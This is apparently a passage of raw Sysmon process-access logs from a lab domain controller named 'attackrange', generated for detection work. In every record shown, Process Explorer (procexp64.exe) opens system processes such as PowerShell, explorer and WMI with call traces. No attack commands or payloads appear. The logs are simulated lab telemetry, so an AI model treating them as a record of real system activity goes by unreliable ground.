Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791139Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3263-6010-DAA2-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791138Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3263-6010-DAA2-00000000A301}6708C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791137Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791136Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791135Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791134Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791133Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791132Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791131Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791130Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791129Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791128Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791127Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791126Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791125Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791124Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791123Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:51.610{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791122Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 